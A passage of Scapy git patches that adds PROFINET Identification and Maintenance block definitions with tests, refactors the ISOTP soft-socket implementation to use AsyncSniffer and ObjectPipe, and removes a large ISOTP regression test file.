super(TestSocket, self.__paired_socket).send(sx) + for r in self.paired_sockets: + super(TestSocket, r).send(sx) try: x.sent_time = time.time() except AttributeError: @@ -282,3 +277,10 @@ def sr1(self, *args, **kargs): return SuperSocket.sr1(self, *args, **kargs) else: return SuperSocket.sr1.im_func(self, *args, **kargs) + + def sniff(self, *args, **kargs): + # type: (Any, Any) -> PacketList + if six.PY3: + return SuperSocket.sniff(self, *args, **kargs) + else: + return SuperSocket.sniff.im_func(self, *args, **kargs) From 6fba1652b75e21d50a37b9e98e508efece3b3709 Mon Sep 17 00:00:00 2001 From: Chris Packham Date: Wed, 28 Jul 2021 13:09:46 +1200 Subject: [PATCH 0643/1632] contrib/pnio: Add Identification and Maintenance (I&M) blocks Add definitions and tests for I&M 0-4. I&M5 is more complicated so that hasn't been included for now. Signed-off-by: Chris Packham --- scapy/contrib/pnio_rpc.py | 77 +++++++++++++++++++++++++++++++++++++++ test/contrib/pnio_rpc.uts | 24 ++++++++++++ 2 files changed, 101 insertions(+) diff --git a/scapy/contrib/pnio_rpc.py b/scapy/contrib/pnio_rpc.py index 6ba97e6969c..6a75e7ffd7b 100644 --- a/scapy/contrib/pnio_rpc.py +++ b/scapy/contrib/pnio_rpc.py @@ -626,6 +626,76 @@ def post_build(self, p, pay): return Packet.post_build(self, p, pay) +# I&M0 +class IM0Block(Block): + """Identification and Maintenance 0""" + fields_desc = [ + BlockHeader, + ByteField("VendorIDHigh", 0x00), + ByteField("VendorIDLow", 0x00), + StrFixedLenField("OrderID", "", length=20), + StrFixedLenField("IMSerialNumber", "", length=16), + ShortField("IMHardwareRevision", 0), + StrFixedLenField("IMSWRevisionPrefix", "V", length=1), + ByteField("IMSWRevisionFunctionalEnhancement", 0), + ByteField("IMSWRevisionBugFix", 0), + ByteField("IMSWRevisionInternalChange", 0), + ShortField("IMRevisionCounter", 0), + ShortField("IMProfileID", 0), + ShortField("IMProfileSpecificType", 0), + ByteField("IMVersionMajor", 1), + ByteField("IMVersionMinor", 1), + ShortField("IMSupported", 0x0), + ] + + block_type = 0x0020 + + +# I&M1 +class IM1Block(Block): + """Identification and Maintenance 1""" + fields_desc = [ + BlockHeader, + StrFixedLenField("IMTagFunction", "", length=32), + StrFixedLenField("IMTagLocation", "", length=22), + ] + + block_type = 0x0021 + + +# I&M2 +class IM2Block(Block): + """Identification and Maintenance 2""" + fields_desc = [ + BlockHeader, + StrFixedLenField("IMDate", "", length=16), + ] + + block_type = 0x0022 + + +# I&M3 +class IM3Block(Block): + """Identification and Maintenance 3""" + fields_desc = [ + BlockHeader, + StrFixedLenField("IMDescriptor", "", length=54), + ] + + block_type = 0x0023 + + +# I&M4 +class IM4Block(Block): + """Identification and Maintenance 4""" + fields_desc = [ + BlockHeader, + StrFixedLenField("IMSignature", "", 54) + ] + + block_type = 0x0024 + + # ARBlockRe{q,s} class ARBlockReq(Block): """Application relationship block request""" @@ -1113,6 +1183,13 @@ class Alarm_High(Packet): # PROFINET IO DCE/RPC PDU PNIO_RPC_BLOCK_ASSOCIATION = { + # I&M Records + "0020": IM0Block, + "0021": IM1Block, + "0022": IM2Block, + "0023": IM3Block, + "0024": IM4Block, + # requests "0101": ARBlockReq, "0102": IOCRBlockReq, diff --git a/test/contrib/pnio_rpc.uts b/test/contrib/pnio_rpc.uts index 0ae0c3d265b..d11da502d0f 100644 --- a/test/contrib/pnio_rpc.uts +++ b/test/contrib/pnio_rpc.uts @@ -204,6 +204,30 @@ p == IODWriteMultipleRes(ARUUID='01234567-89ab-cdef-0123-456789abcdef', recordDa ]) / conf.padding_layer(b'\xef') +#################################################################### +#################################################################### + ++ Check I&M + += IM0Block default values +raw(IM0Block()) == bytearray.fromhex('002000380100000000000000000000000000000000000000000000000000000000000000000000000000000000005600000000000000000001010000') + += IM0Block basic example +raw(IM0Block(OrderID='foobar', IMSerialNumber='ABCDEF1234567890')) == bytearray.fromhex('0020003801000000666f6f62617200000000000000000000000000004142434445463132333435363738393000005600000000000000000001010000') + += IM1Block default values +raw(IM1Block()) == bytearray.fromhex('002100380100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000') + += IM2Block default values +raw(IM2Block()) == bytearray.fromhex('00220012010000000000000000000000000000000000') + += IM3Block default values +raw(IM3Block()) == bytearray.fromhex('002300380100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000') + += IM4Block default values +raw(IM4Block()) == bytearray.fromhex('002400380100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000') + + #################################################################### #################################################################### From 386d7fa4d811b35364ca325353123685ac84c4dd Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sat, 11 Sep 2021 18:56:45 +0200 Subject: [PATCH 0644/1632] Refactoring of ISOTPSoftSockets (#3318) * Refactoring of ISOTPSoftSockets Split up isotp.uts and applied refactorings cleanup threads fix tox Change blocking type cleanup cleanup * update --- scapy/contrib/isotp/isotp_soft_socket.py | 128 +- scapy/layers/can.py | 8 +- test/contrib/automotive/interface_mockup.py | 6 - test/contrib/isotp.uts | 2351 ------------------- test/contrib/isotp_message_builder.uts | 263 +++ test/contrib/isotp_native_socket.uts | 628 +++++ test/contrib/isotp_packet.uts | 465 ++++ test/contrib/isotp_soft_socket.uts | 936 ++++++++ 8 files changed, 2322 insertions(+), 2463 deletions(-) delete mode 100644 test/contrib/isotp.uts create mode 100644 test/contrib/isotp_message_builder.uts create mode 100644 test/contrib/isotp_native_socket.uts create mode 100644 test/contrib/isotp_packet.uts create mode 100644 test/contrib/isotp_soft_socket.uts diff --git a/scapy/contrib/isotp/isotp_soft_socket.py b/scapy/contrib/isotp/isotp_soft_socket.py index 539f94f21ff..d6cfee0a13c 100644 --- a/scapy/contrib/isotp/isotp_soft_socket.py +++ b/scapy/contrib/isotp/isotp_soft_socket.py @@ -20,13 +20,13 @@ from scapy.packet import Packet from scapy.layers.can import CAN import scapy.modules.six as six -from scapy.modules.six.moves import queue from scapy.error import Scapy_Exception, warning, log_runtime from scapy.supersocket import SuperSocket from scapy.config import conf from scapy.consts import LINUX -from scapy.sendrecv import sniff +from scapy.sendrecv import AsyncSniffer from scapy.utils import EDecimal +from scapy.automaton import ObjectPipe, select_objects from scapy.contrib.isotp.isotp_packet import ISOTP, CAN_MAX_DLEN, N_PCI_SF, \ N_PCI_CF, N_PCI_FC, N_PCI_FF, ISOTP_MAX_DLEN, ISOTP_MAX_DLEN_2015 @@ -140,7 +140,7 @@ def __init__(self, extended_addr=extended_addr, extended_rx_addr=extended_rx_addr, rx_block_size=rx_block_size, - rx_separation_time_min=stmin, + stmin=stmin, listen_only=listen_only ) @@ -208,100 +208,13 @@ def select(sockets, remain=None): sockets to be ready to receive """ - def find_ready_sockets(socks): - # type: (List[SuperSocket]) -> List[SuperSocket] - return [x for x in socks if isinstance(x, ISOTPSoftSocket) and - not x.closed and not x.impl.rx_queue.empty()] + obj_pipes = [x.impl.rx_queue for x in sockets if + isinstance(x, ISOTPSoftSocket) and not x.closed] - ready_sockets = find_ready_sockets(sockets) + ready_pipes = select_objects(obj_pipes, remain) - blocking = remain != 0 - if len(ready_sockets) > 0 or not blocking: - return ready_sockets - - exit_select = Event() - - def my_cb(msg): - # type: (Any) -> None - exit_select.set() - - try: - for s in sockets: - if not s.closed and isinstance(s, ISOTPSoftSocket): - s.impl.rx_callbacks.append(my_cb) - - exit_select.wait(remain) - - finally: - for s in sockets: - if isinstance(s, ISOTPSoftSocket): - try: - s.impl.rx_callbacks.remove(my_cb) - except (ValueError, AttributeError): - pass - - ready_sockets = find_ready_sockets(sockets) - return ready_sockets - - -class CANReceiverThread(Thread): - """ - Helper class that receives CAN frames and feeds them to the provided - callback. It relies on CAN frames being enqueued in the CANSocket object - and not being lost if they come before the sniff method is called. This is - true in general since sniff is usually implemented as repeated recv(), but - might be false in some implementation of CANSocket - - Initialize the thread. In order for this thread to be able to be - stopped by the destructor of another object, it is important to not - keep a reference to the object in the callback function. - - :param socket: the CANSocket upon which this class will call the - sniff() method - :param callback: function to call whenever a CAN frame is received - """ - - def __init__(self, can_socket, callback): - # type: ("CANSocket", Callable[[Packet], None]) -> None - super(CANReceiverThread, self).__init__() - self.socket = can_socket - self.callback = callback - self.exiting = False - self._thread_started = Event() - self.exception = None # type: Optional[Exception] - self.name = "CANReceiver" + self.name - - def start(self): - # type: () -> None - super(CANReceiverThread, self).start() - if not self._thread_started.wait(5): - raise Scapy_Exception("CAN RX thread not started in 5s.") - - def run(self): - # type: () -> None - self._thread_started.set() - try: - def prn(msg): - # type: (Packet) -> None - if not self.exiting: - self.callback(msg) - - while 1: - try: - sniff(store=False, timeout=1, count=1, - stop_filter=lambda x: self.exiting, - prn=prn, opened_socket=self.socket) - except ValueError as ex: - if not self.exiting: - raise ex - if self.exiting: - return - except Exception as e: - self.exception = e - - def stop(self): - # type: () -> None - self.exiting = True + return [x for x in sockets if isinstance(x, ISOTPSoftSocket) and + not x.closed and x.impl.rx_queue in ready_pipes] class TimeoutScheduler: @@ -573,7 +486,7 @@ class ISOTPSocketImplementation: :param rx_block_size: Block Size byte to be included in every Control Flow Frame sent by this object. The default value of 0 means that all the data will be received in a single block. - :param rx_separation_time_min: Time Minimum Separation byte to be + :param stmin: Time Minimum Separation byte to be included in every Control Flow Frame sent by this object. The default value of 0 indicates that the peer will not wait any time between sending frames. @@ -588,7 +501,7 @@ def __init__(self, extended_addr=None, # type: Optional[int] extended_rx_addr=None, # type: Optional[int] rx_block_size=0, # type: int - rx_separation_time_min=0, # type: int + stmin=0, # type: int listen_only=False # type: bool ): # type: (...) -> None @@ -608,9 +521,9 @@ def __init__(self, self.listen_only = listen_only self.rxfc_bs = rx_block_size - self.rxfc_stmin = rx_separation_time_min + self.rxfc_stmin = stmin - self.rx_queue = queue.Queue() + self.rx_queue = ObjectPipe() self.rx_len = -1 self.rx_buf = None # type: Optional[bytes] self.rx_sn = 0 @@ -632,7 +545,10 @@ def __init__(self, self.tx_timeout_handle = None # type: Optional[TimeoutScheduler.Handle] # noqa: E501 self.rx_timeout_handle = None # type: Optional[TimeoutScheduler.Handle] # noqa: E501 - self.rx_thread = CANReceiverThread(can_socket, self.on_can_recv) + self.rx_thread_started = Event() + self.rx_thread = AsyncSniffer( + store=False, opened_socket=can_socket, prn=self.on_can_recv, + started_callback=self.rx_thread_started.set) self.tx_mutex = Lock() self.rx_mutex = Lock() @@ -645,6 +561,7 @@ def __init__(self, self.rx_callbacks = [] # type: List[Callable[[bytes], None]] self.rx_thread.start() + self.rx_thread_started.wait(5) def __del__(self): # type: () -> None @@ -674,7 +591,8 @@ def on_can_recv(self, p): def close(self): # type: () -> None - self.rx_thread.stop() + if self.rx_thread.thread and self.rx_thread.thread.is_alive(): + self.rx_thread.stop(True) def _rx_timer_handler(self): # type: () -> None @@ -856,7 +774,7 @@ def _recv_sf(self, data, ts): return msg = data[1:1 + length] - self.rx_queue.put((msg, ts)) + self.rx_queue.send((msg, ts)) for cb in self.rx_callbacks: cb(msg) @@ -953,7 +871,7 @@ def _recv_cf(self, data): # we are done self.rx_buf = self.rx_buf[0:self.rx_len] self.rx_state = ISOTP_IDLE - self.rx_queue.put((self.rx_buf, self.rx_ts)) + self.rx_queue.send((self.rx_buf, self.rx_ts)) for cb in self.rx_callbacks: cb(self.rx_buf) self.rx_buf = None @@ -1042,6 +960,6 @@ def recv(self, timeout=None): for at most 'timeout' seconds.""" try: - return self.rx_queue.get(timeout is None or timeout > 0, timeout) - except queue.Empty: + return self.rx_queue.recv() + except IndexError: return None diff --git a/scapy/layers/can.py b/scapy/layers/can.py index 0d73aa4dd10..2a561f91ce4 100644 --- a/scapy/layers/can.py +++ b/scapy/layers/can.py @@ -614,6 +614,11 @@ def fileno(self): """Emulation of SuperSocket""" return self.f.fileno() + @property + def closed(self): + # type: () -> bool + return self.f.closed + def close(self): # type: () -> Any """Emulation of SuperSocket""" @@ -631,4 +636,5 @@ def __exit__(self, exc_type, exc_value, tracback): def select(sockets, remain=None): # type: (List[SuperSocket], Optional[int]) -> List[SuperSocket] """Emulation of SuperSocket""" - return sockets + return [s for s in sockets if isinstance(s, CandumpReader) and + not s.closed] diff --git a/test/contrib/automotive/interface_mockup.py b/test/contrib/automotive/interface_mockup.py index d5bb8dd7a31..2c410002f59 100644 --- a/test/contrib/automotive/interface_mockup.py +++ b/test/contrib/automotive/interface_mockup.py @@ -119,12 +119,6 @@ def cleanup_interfaces(): :return: True on success """ - import threading - from scapy.contrib.isotp.isotp_soft_socket import CANReceiverThread - for t in threading.enumerate(): - if isinstance(t, CANReceiverThread): - t.join(10) - if LINUX and _not_pypy and _root: if 0 != subprocess.call(["ip", "link", "delete", iface0]): raise Exception("%s could not be deleted" % iface0) diff --git a/test/contrib/isotp.uts b/test/contrib/isotp.uts deleted file mode 100644 index a9ce1bbff2a..00000000000 --- a/test/contrib/isotp.uts +++ /dev/null @@ -1,2351 +0,0 @@ -% Regression tests for ISOTP - -~ automotive_comm disabled - -+ Configuration -~ conf - -= Imports - -from scapy.modules.six.moves.queue import Queue -from io import BytesIO -from scapy.contrib.isotp.isotp_scanner import get_isotp_packet - -import scapy.modules.six as six - -with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: - exec(f.read()) - -= Definition of constants, utility functions and mock classes - - -class MockCANSocket(SuperSocket): - nonblocking_socket = True - def __init__(self, rcvd_queue=None): - self.rcvd_queue = Queue() - self.sent_queue = Queue() - if rcvd_queue is not None: - for c in rcvd_queue: - self.rcvd_queue.put(c) - def recv_raw(self, x=MTU): - pkt = bytes(self.rcvd_queue.get(True, 2)) - return CAN, pkt, None - def send(self, p): - self.sent_queue.put(p) - @staticmethod - def select(sockets, remain=None): - return sockets - - -# utility function that waits on list l for n elements, timing out if nothing is added for 1 second -def list_wait(l, n): - old_len = 0 - c = 0 - while len(l) < n: - if c > 100: - return False - if len(l) == old_len: - time.sleep(0.01) - c += 1 - else: - old_len = len(l) - c = 0 - -# hexadecimal to bytes convenience function -if six.PY2: - dhex = lambda s: "".join(s.split()).decode('hex') -else: - dhex = bytes.fromhex - - -+ Syntax check - -= Import isotp - -conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': False} - -if six.PY3: - import importlib - if "scapy.contrib.isotp" in sys.modules: - importlib.reload(scapy.contrib.isotp) - -load_contrib("isotp", globals_dict=globals()) - -ISOTPSocket = ISOTPSoftSocket - -+ ISOTP packet check - -= Creation of an empty ISOTP packet -p = ISOTP() -assert(p.data == b"") -assert(p.src is None and p.dst is None and p.exsrc is None and p.exdst is None) -assert(bytes(p) == b"") - -= Creation of a simple ISOTP packet with src -p = ISOTP(b"eee", src=0x241) -assert(p.src == 0x241) -assert(p.data == b"eee") -assert(bytes(p) == b"eee") - -= Creation of a simple ISOTP packet with exsrc -p = ISOTP(b"eee", exsrc=0x41) -assert(p.exsrc == 0x41) -assert(p.data == b"eee") -assert(bytes(p) == b"eee") - -= Creation of a simple ISOTP packet with dst -p = ISOTP(b"eee", dst=0x241) -assert(p.dst == 0x241) -assert(p.data == b"eee") -assert(bytes(p) == b"eee") - -= Creation of a simple ISOTP packet with exdst -p = ISOTP(b"eee", exdst=0x41) -assert(p.exdst == 0x41) -assert(p.data == b"eee") -assert(bytes(p) == b"eee") - -= Creation of a simple ISOTP packet with src, dst, exsrc, exdst -p = ISOTP(b"eee", src=1, dst=2, exsrc=3, exdst=4) -assert(p.dst == 2) -assert(p.exdst == 4) -assert(p.src == 1) -assert(p.exsrc == 3) -assert(p.data == b"eee") -assert(bytes(p) == b"eee") - -= ISOTP answers test -p = ISOTP() -r = ISOTP() -assert(p.data == b"") -assert(p.answers(r)) -assert(not p.answers(Raw())) - - -= Creation of a simple ISOTP packet with src validation error -ex = False -try: - p = ISOTP(b"eee", src=0x1000000000, dst=2, exsrc=3, exdst=4) -except Scapy_Exception: - ex = True - -assert ex - -= Creation of a simple ISOTP packet with dst validation error -ex = False -try: - p = ISOTP(b"eee", src=0x10, dst=0x20000000000, exsrc=3, exdst=4) -except Scapy_Exception: - ex = True - -assert ex - -= Creation of a simple ISOTP packet with exsrc validation error -ex = False -try: - p = ISOTP(b"eee", src=0x10, dst=2, exsrc=3000, exdst=4) -except Scapy_Exception: - ex = True - -assert ex - - -= Creation of a simple ISOTP packet with exdst validation error -ex = False -try: - p = ISOTP(b"eee", src=0x10, dst=2, exsrc=30, exdst=400) -except Scapy_Exception: - ex = True - -assert ex - -+ ISOTPFrame related checks - -= Build a packet with extended addressing -pkt = CAN(identifier=0x123, data=b'\x42\x10\xff\xde\xea\xdd\xaa\xaa') -isotpex = ISOTPHeaderEA(bytes(pkt)) -assert(isotpex.type == 1) -assert(isotpex.message_size == 0xff) -assert(isotpex.extended_address == 0x42) -assert(isotpex.identifier == 0x123) -assert(isotpex.length == 8) - -= Build a packet with normal addressing -pkt = CAN(identifier=0x123, data=b'\x10\xff\xde\xea\xdd\xaa\xaa') -isotpno = ISOTPHeader(bytes(pkt)) -assert(isotpno.type == 1) -assert(isotpno.message_size == 0xff) -assert(isotpno.identifier == 0x123) -assert(isotpno.length == 7) - -= Compare both isotp payloads -assert(isotpno.data == isotpex.data) -assert(isotpno.message_size == isotpex.message_size) - -= Dissect multiple packets -frames = \ - [b'\x00\x00\x00\x00\x08\x00\x00\x00\x10(\xde\xad\xbe\xef\xde\xad', - b'\x00\x00\x00\x00\x08\x00\x00\x00!\xbe\xef\xde\xad\xbe\xef\xde', - b'\x00\x00\x00\x00\x08\x00\x00\x00"\xad\xbe\xef\xde\xad\xbe\xef', - b'\x00\x00\x00\x00\x08\x00\x00\x00#\xde\xad\xbe\xef\xde\xad\xbe', - b'\x00\x00\x00\x00\x08\x00\x00\x00$\xef\xde\xad\xbe\xef\xde\xad', - b'\x00\x00\x00\x00\x07\x00\x00\x00%\xbe\xef\xde\xad\xbe\xef'] - -isotpframes = [ISOTPHeader(x) for x in frames] - -assert(isotpframes[0].type == 1) -assert(isotpframes[0].message_size == 40) -assert(isotpframes[0].length == 8) -assert(isotpframes[1].type == 2) -assert(isotpframes[1].index == 1) -assert(isotpframes[1].length == 8) -assert(isotpframes[2].type == 2) -assert(isotpframes[2].index == 2) -assert(isotpframes[2].length == 8) -assert(isotpframes[3].type == 2) -assert(isotpframes[3].index == 3) -assert(isotpframes[3].length == 8) -assert(isotpframes[4].type == 2) -assert(isotpframes[4].index == 4) -assert(isotpframes[4].length == 8) -assert(isotpframes[5].type == 2) -assert(isotpframes[5].index == 5) -assert(isotpframes[5].length == 7) - -= Build SF frame with constructor, check for correct length assignments -p = ISOTPHeader(bytes(ISOTPHeader()/ISOTP_SF(data=b'\xad\xbe\xad\xff'))) -assert(p.length == 5) -assert(p.message_size == 4) -assert(len(p.data) == 4) -assert(p.data == b'\xad\xbe\xad\xff') -assert(p.type == 0) -assert(p.identifier == 0) - -= Build SF frame EA with constructor, check for correct length assignments -p = ISOTPHeaderEA(bytes(ISOTPHeaderEA()/ISOTP_SF(data=b'\xad\xbe\xad\xff'))) -assert(p.extended_address == 0) -assert(p.length == 6) -assert(p.message_size == 4) -assert(len(p.data) == 4) -assert(p.data == b'\xad\xbe\xad\xff') -assert(p.type == 0) -assert(p.identifier == 0) - -= Build FF frame with constructor, check for correct length assignments -p = ISOTPHeader(bytes(ISOTPHeader()/ISOTP_FF(message_size=10, data=b'\xad\xbe\xad\xff'))) -assert(p.length == 6) -assert(p.message_size == 10) -assert(len(p.data) == 4) -assert(p.data == b'\xad\xbe\xad\xff') -assert(p.type == 1) -assert(p.identifier == 0) - -= Build FF frame EA with constructor, check for correct length assignments -p = ISOTPHeaderEA(bytes(ISOTPHeaderEA()/ISOTP_FF(message_size=10, data=b'\xad\xbe\xad\xff'))) -assert(p.extended_address == 0) -assert(p.length == 7) -assert(p.message_size == 10) -assert(len(p.data) == 4) -assert(p.data == b'\xad\xbe\xad\xff') -assert(p.type == 1) -assert(p.identifier == 0) - -= Build FF frame EA, extended size, with constructor, check for correct length assignments -p = ISOTPHeaderEA(bytes(ISOTPHeaderEA()/ISOTP_FF(message_size=0, - extended_message_size=2000, - data=b'\xad'))) -assert(p.extended_address == 0) -assert(p.length == 8) -assert(p.message_size == 0) -assert(p.extended_message_size == 2000) -assert(len(p.data) == 1) -assert(p.data == b'\xad') -assert(p.type == 1) -assert(p.identifier == 0) - -= Build FF frame, extended size, with constructor, check for correct length assignments -p = ISOTPHeader(bytes(ISOTPHeader()/ISOTP_FF(message_size=0, - extended_message_size=2000, - data=b'\xad'))) -assert(p.length == 7) -assert(p.message_size == 0) -assert(p.extended_message_size == 2000) -assert(len(p.data) == 1) -assert(p.data == b'\xad') -assert(p.type == 1) -assert(p.identifier == 0) - -= Build CF frame with constructor, check for correct length assignments -p = ISOTPHeader(bytes(ISOTPHeader()/ISOTP_CF(data=b'\xad'))) -assert(p.length == 2) -assert(p.index == 0) -assert(len(p.data) == 1) -assert(p.data == b'\xad') -assert(p.type == 2) -assert(p.identifier == 0) - -= Build CF frame EA with constructor, check for correct length assignments -p = ISOTPHeaderEA(bytes(ISOTPHeaderEA()/ISOTP_CF(data=b'\xad'))) -assert(p.length == 3) -assert(p.index == 0) -assert(len(p.data) == 1) -assert(p.data == b'\xad') -assert(p.type == 2) -assert(p.identifier == 0) - -= Build FC frame EA with constructor, check for correct length assignments -p = ISOTPHeaderEA(bytes(ISOTPHeaderEA()/ISOTP_FC())) -assert(p.length == 4) -assert(p.block_size == 0) -assert(p.separation_time == 0) -assert(p.type == 3) -assert(p.identifier == 0) - -= Build FC frame with constructor, check for correct length assignments -p = ISOTPHeader(bytes(ISOTPHeader()/ISOTP_FC())) -assert(p.length == 3) -assert(p.block_size == 0) -assert(p.separation_time == 0) -assert(p.type == 3) -assert(p.identifier == 0) - -= Construct some single frames -p = ISOTPHeader(identifier=0x123, length=5)/ISOTP_SF(message_size=4, data=b'abcd') -assert(p.length == 5) -assert(p.identifier == 0x123) -assert(p.type == 0) -assert(p.message_size == 4) -assert(p.data == b'abcd') - -= Construct some single frames EA -p = ISOTPHeaderEA(identifier=0x123, length=6, extended_address=42)/ISOTP_SF(message_size=4, data=b'abcd') -assert(p.length == 6) -assert(p.extended_address == 42) -assert(p.identifier == 0x123) -assert(p.type == 0) -assert(p.message_size == 4) -assert(p.data == b'abcd') - -= Construct ISOTP_packet with extended can frame -p = get_isotp_packet(identifier=0x1234, extended=False, extended_can_id=True) -print(p) -assert (p.identifier == 0x1234) -assert (p.flags == "extended") - -= Construct ISOTPEA_Packet with extended can frame -p = get_isotp_packet(identifier=0x1234, extended=True, extended_can_id=True) -print(p) -assert (p.identifier == 0x1234) -assert (p.flags == "extended") - -+ ISOTP fragment and defragment checks - -= Fragment an empty ISOTP message -fragments = ISOTP().fragment() -assert(len(fragments) == 1) -assert(fragments[0].data == b"\0") - -= Fragment another empty ISOTP message -fragments = ISOTP(b"").fragment() -assert(len(fragments) == 1) -assert(fragments[0].data == b"\0") - -= Fragment a 4 bytes long ISOTP message -fragments = ISOTP(b"data", src=0x241).fragment() -assert(len(fragments) == 1) -assert(isinstance(fragments[0], CAN)) -fragment = CAN(bytes(fragments[0])) -assert(fragment.data == b"\x04data") -assert(fragment.flags == 0) -assert(fragment.length == 5) -assert(fragment.reserved == 0) - -= Fragment a 4 bytes long ISOTP message extended -fragments = ISOTP(b"data", dst=0x1fff0000).fragment() -assert(len(fragments) == 1) -assert(isinstance(fragments[0], CAN)) -fragment = CAN(bytes(fragments[0])) -assert(fragment.data == b"\x04data") -assert(fragment.length == 5) -assert(fragment.reserved == 0) -assert(fragment.flags == 4) - -= Fragment a 8 bytes long ISOTP message extended -fragments = ISOTP(b"datadata", dst=0x1fff0000).fragment() -assert(len(fragments) == 2) -assert(isinstance(fragments[0], CAN)) -fragment = CAN(bytes(fragments[0])) -assert(fragment.data == b"\x10\x08datada") -assert(fragment.length == 8) -assert(fragment.reserved == 0) -assert(fragment.flags == 4) -fragment = CAN(bytes(fragments[1])) -assert(fragment.data == b"\x21ta") -assert(fragment.length == 3) -assert(fragment.reserved == 0) -assert(fragment.flags == 4) - -= Fragment a 7 bytes long ISOTP message -fragments = ISOTP(b"abcdefg").fragment() -assert(len(fragments) == 1) -assert(fragments[0].data == b"\x07abcdefg") - -= Fragment a 8 bytes long ISOTP message -fragments = ISOTP(b"abcdefgh").fragment() -assert(len(fragments) == 2) -assert(fragments[0].data == b"\x10\x08abcdef") -assert(fragments[1].data == b"\x21gh") - -= Fragment an ISOTP message with extended addressing -isotp = ISOTP(b"abcdef", exdst=ord('A')) -fragments = isotp.fragment() -assert(len(fragments) == 1) -assert(fragments[0].data == b"A\x06abcdef") - -= Fragment a 7 bytes ISOTP message with destination identifier -isotp = ISOTP(b"abcdefg", dst=0x64f) -fragments = isotp.fragment() -assert(len(fragments) == 1) -assert(fragments[0].data == b"\x07abcdefg") -assert(fragments[0].identifier == 0x64f) - -= Fragment a 16 bytes ISOTP message with extended addressing -isotp = ISOTP(b"abcdefghijklmnop", dst=0x64f, exdst=ord('A')) -fragments = isotp.fragment() -assert(len(fragments) == 3) -assert(fragments[0].data == b"A\x10\x10abcde") -assert(fragments[1].data == b"A\x21fghijk") -assert(fragments[2].data == b"A\x22lmnop") -assert(fragments[0].identifier == 0x64f) -assert(fragments[1].identifier == 0x64f) -assert(fragments[2].identifier == 0x64f) - -= Fragment a huge ISOTP message, 4997 bytes long -data = b"T" * 4997 -isotp = ISOTP(b"T" * 4997, dst=0x345) -fragments = isotp.fragment() -assert(len(fragments) == 715) -assert(fragments[0].data == dhex("10 00 00 00 13 85") + b"TT") -assert(fragments[1].data == b"\x21TTTTTTT") -assert(fragments[-2].data == b"\x29TTTTTTT") -assert(fragments[-1].data == b"\x2ATTTT") - -= Defragment a single-frame ISOTP message -fragments = [CAN(identifier=0x641, data=b"\x04test")] -isotp = ISOTP.defragment(fragments) -isotp.show() -assert(isotp.data == b"test") -assert(isotp.dst == 0x641) - -= Defragment non ISOTP message -fragments = [CAN(identifier=0x641, data=b"\xa4test")] -isotp = ISOTP.defragment(fragments) -assert isotp is None - -= Defragment ISOTP message with warning -fragments = [CAN(identifier=0x641, data=b"\x04test"), CAN(identifier=0x642, data=b"\x04test")] -isotp = ISOTP.defragment(fragments) -assert(isotp.data == b"test") -assert(isotp.dst == 0x641) - -= Defragment exception -fragments = [] -ex = False -try: - isotp = ISOTP.defragment(fragments) - isotp.show() -except Scapy_Exception: - ex = True - -assert ex - -= Fragment exception -ex = False -try: - fragments = ISOTP(b"a" * (1 << 32)).fragment() -except Scapy_Exception: - ex = True - -assert ex - -= Defragment an ISOTP message composed of multiple CAN frames -fragments = [ - CAN(identifier=0x641, data=dhex("41 10 10 61 62 63 64 65")), - CAN(identifier=0x641, data=dhex("41 21 66 67 68 69 6A 6B")), - CAN(identifier=0x641, data=dhex("41 22 6C 6D 6E 6F 70 00")) -] -isotp = ISOTP.defragment(fragments) -isotp.show() -assert(isotp.data == dhex("61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70")) -assert(isotp.dst == 0x641) -assert(isotp.exdst == 0x41) - -= Check if fragmenting a message and defragmenting it back yields the original message -isotp1 = ISOTP(b"abcdef", exdst=ord('A')) -fragments = isotp1.fragment() -isotp2 = ISOTP.defragment(fragments) -isotp2.show() -assert(isotp1 == isotp2) - -isotp1 = ISOTP(b"abcdefghijklmnop") -fragments = isotp1.fragment() -isotp2 = ISOTP.defragment(fragments) -isotp2.show() -assert(isotp1 == isotp2) - -isotp1 = ISOTP(b"abcdefghijklmnop", exdst=ord('A')) -fragments = isotp1.fragment() -isotp2 = ISOTP.defragment(fragments) -isotp2.show() -assert(isotp1 == isotp2) - -isotp1 = ISOTP(b"T"*5000, exdst=ord('A')) -fragments = isotp1.fragment() -isotp2 = ISOTP.defragment(fragments) -isotp2.show() -assert(isotp1 == isotp2) - -= Defragment an ambiguous CAN frame -fragments = [CAN(identifier=0x641, data=dhex("02 01 AA"))] -isotp = ISOTP.defragment(fragments, False) -isotp.show() -assert(isotp.data == dhex("01 AA")) -assert(isotp.exdst == None) -isotpex = ISOTP.defragment(fragments, True) -isotpex.show() -assert(isotpex.data == dhex("AA")) -assert(isotpex.exdst == 0x02) - - -+ Testing ISOTPMessageBuilder - -= Create ISOTPMessageBuilder -m = ISOTPMessageBuilder() - -= Feed packets to machine -ff = CAN(identifier=0x241, data=dhex("10 28 01 02 03 04 05 06")) -ff.time = 1000 -m.feed(ff) -m.feed(CAN(identifier=0x641, data=dhex("30 03 00" ))) -m.feed(CAN(identifier=0x241, data=dhex("21 07 08 09 0A 0B 0C 0D"))) -m.feed(CAN(identifier=0x241, data=dhex("22 0E 0F 10 11 12 13 14"))) -m.feed(CAN(identifier=0x241, data=dhex("23 15 16 17 18 19 1A 1B"))) -m.feed(CAN(identifier=0x641, data=dhex("30 03 00" ))) -m.feed(CAN(identifier=0x241, data=dhex("24 1C 1D 1E 1F 20 21 22"))) -m.feed(CAN(identifier=0x241, data=dhex("25 23 24 25 26 27 28" ))) - -= Verify there is a ready message in the machine -assert(m.count == 1) - -= Extract the message from the machine -msg = m.pop() -assert(m.count == 0) -assert(msg.dst == 0x241) -assert(msg.exdst is None) -assert(msg.src == 0x641) -assert(msg.exsrc is None) -assert(msg.time == 1000) -expected = dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28") -assert(msg.data == expected) - -= Verify that no error happens when there is not enough data -m = ISOTPMessageBuilder() -m.feed(CAN(identifier=0x241, data=dhex("04 AB CD EF"))) -msg = m.pop() -assert(msg is None) - -= Verify that no error happens when there is no data -m = ISOTPMessageBuilder() 